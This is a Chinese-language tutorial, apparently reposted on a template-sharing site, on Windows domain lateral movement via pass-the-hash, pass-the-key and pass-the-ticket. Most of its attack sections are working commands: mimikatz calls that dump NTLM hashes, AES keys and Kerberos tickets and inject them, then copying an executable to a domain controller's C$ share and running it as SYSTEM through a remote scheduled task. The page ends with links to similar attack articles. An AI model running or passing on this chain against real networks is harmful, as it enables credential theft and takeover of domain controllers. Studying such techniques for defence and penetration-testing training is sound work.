传递攻击-横向移动

这篇具有很好参考价值的文章主要介绍了传递攻击-横向移动。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

传递攻击-横向移动

目录
  • 传递攻击-横向移动
    • 一、哈希传递攻击(PTH)
    • 二、哈希传递条件
    • 三、哈希传递攻击步骤
    • 四、密钥传递攻击(PTK)
    • 五、KB2871997补丁
    • 六、密钥传递攻击步骤
    • 七、票据传递攻击(PTT)
    • 八、票据传递攻击两种方式
    • 九、票据传递攻击步骤

一、哈希传递攻击(PTH)

哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。

二、哈希传递条件

哈希传递攻击的前提:有管理员的 NTLM Hash ,并且目标机器开放445端口。

工作组环境中:

(1)Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。

(2)Windows Vista 之后的机器,只能是administrator(SID为500)用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。

域环境中:

只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器。

三、哈希传递攻击步骤

1、使用CS远控一台机器

2、通过这台机器进行信息收集,使用mimikatz抓取administrator用户的NTLM哈希值

mimikatz sekurlsa::logonPasswords

3、拿到哈希值,可以尝试哈希传递

mimikatz "sekurlsa::pth" /user:用户名 /domain:域名 /ntlm:ntlm值

四、密钥传递攻击(PTK)

密钥传递攻击 (pass the key)是在域中攻击 kerberos 认证的一种方式,原理是通过获取用户的aes,通过 kerberos 认证,可在NTLM认证被禁止的情况下用来实现类似pth的功能。

五、KB2871997补丁

安装了KB2871997补丁或者系统版本大于windows server 2012时,系统的内存不保存明文的密码。

KB2871997 补丁发布后常规的 Pass The Hash已经无法成功(除了 SID 500 账号例外),但是还可以通过AES密钥来替代NTLM验证进行横向的操作。

六、密钥传递攻击步骤

1、使用CS远控一台域内机器

2、抓取aes值

mimikatz sekurlsa::ekeys

3、拿到aes值,可以尝试密码传递

sekurlsa::pth /user:用户名 /domain:域名 /aes256:aes256 值

七、票据传递攻击(PTT)

票据传递攻击(Pass-the-Ticket) 是一类利用后攻击,涉及盗窃和重复使用 Kerberos 票证,以在受感染的环境中对系统进行身份验证。在 Pass-the-Ticket 攻击中,攻击者从一台计算机上窃取 Kerberos 票证,并重新使用它来访问受感染环境中的另一台计算机。

八、票据传递攻击两种方式

1、自己制作票据

2、传递内存中的票据

九、票据传递攻击步骤

以下是传递内存中的票据方式:

1、导出内存的票据

mimikatz "sekurlsa::tickets" /export 

2、清除内存中的票据

mimikatz kerberos::purge

3、将高权限的票据文件注入内存

mimikatz kerberos::ptt 票据名

4、查看票据

mimikatz kerberos::tgt

5、上线域控

(1)复制文件

shell copy C:\Users\Administrator\Desktop\trust\can.exe \\dc.candada.com\C$

(2)创建计划任务

shell schtasks /create /s dc.candada.com /tn can /sc onstart /tr c:\can.exe /ru system /f

(3)运行计划任务文章来源地址https://www.toymoban.com/news/detail-478255.html

shell schtasks /run /s dc.candada.com /i /tn "can"

到了这里,关于传递攻击-横向移动的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS

    用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRMWinRS-明文NTLM 1.探针可用: 2.连接执行: 3.上线 CSMSF: 4.CS 内置横向移动 三、域横向移动-SpnKerberos-请求破解重写 Kerberoasting攻击的利用:

    2024年02月19日
    浏览(40)
  • 68 内网安全-域横向PTH&PTK&PTT哈希票据传递

    PTH(pass the hash) #利用lm或ntlm的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证TGT进行的渗透测试 PTK(pass the key) #利用的ekeys aes256进行的渗透测试 #PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务而不用提供明文密码

    2024年02月06日
    浏览(41)
  • p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

    数据来源 ​ ​ Kerberos 协议具体工作方法,在域中,简要介绍一下: 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket) 将 TGT 进行加密签名返回给客户机器,只

    2024年02月01日
    浏览(39)
  • 利用SCCM进行横向移动

    SCCM全名为System Center Configuration Manager,从版本1910开始,微软官方将其从Microsoft System Center产品移除,重新命名为Microsoft Endpoint Configuration Manager(ConfigMgr),其可帮助 IT 部门管理电脑和服务器,保持软件的最新状态,设置配置和安全策略,并监控系统状态,同时让员工能够访

    2024年02月13日
    浏览(32)
  • IPC横向移动

    目录 IPC横向移动 一、IPC介绍 二、IPC利用条件 三、IPC连接失败原因 四、IPC连接常见错误 五、IPC配合计划任务横向移动 六、IPC配合系统服务横向移动 IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码

    2024年02月07日
    浏览(70)
  • 使用外部工具横向移动

    Smbexe、Psexec Psexec PsExec是一种轻巧的telnet代替品,可让您在其他系统上执行进程,并为控制台应用提供完整的交互性,无需手动安装客户端软件。 原理: 1、ipc$连接,释放Psexesvc.exe 2、OpenSCManager打开受害者机器上服务控制管理器的句柄 3、CreateService创建服务 4、获取服务句柄

    2024年02月07日
    浏览(34)
  • 内网渗透-内置工具横向移动

    前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view

    2024年02月09日
    浏览(37)
  • 利用远控工具横向移动

    目录 利用远控工具横向移动 一、利用远控工具向日葵横向移动 1、向日葵介绍 2、利用思路 二、利用远控工具todesk横向移动 1、Todesk介绍 2、利用思路 三、利用远控工具GoToHTTP横向移动 1、GoToHTTP介绍 2、利用思路 四、利用远控工具RustDESK横向移动 1、RustDESK介绍 2、利用思路 向

    2024年02月07日
    浏览(40)
  • WMIC远程执行命令横向移动

    目录 WMIC远程执行命令横向移动 一、wmic介绍 二、wmic常用命令 三、wmic配合powershell上线CS 四、Wmiexec配合powershell上线CS 五、wmiexec.vbs配合powershell上线CS 六、Invoke-WMIExec.ps1配合powershell上线CS 七、Invoke-WMIMethod.ps1上线CS wmic扩展wmi(Windows Management Instrumentation,Windows管理工具) ,提

    2024年02月08日
    浏览(35)
  • DCOM远程执行命令横向移动

    目录 DCOM远程执行命令横向移动 一、DCOM介绍 二、获取DCOM列表 三、DCOM横向条件 四、MMC20.Application远程执行命令 五、ShellWindows远程执行命令 六、ShellBrowserWindow远程执行命令 七、调用Excel.Application远程执行命令 八、Visio.Application远程执行命令 九、Outlook.Application远程执行命令

    2024年02月08日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包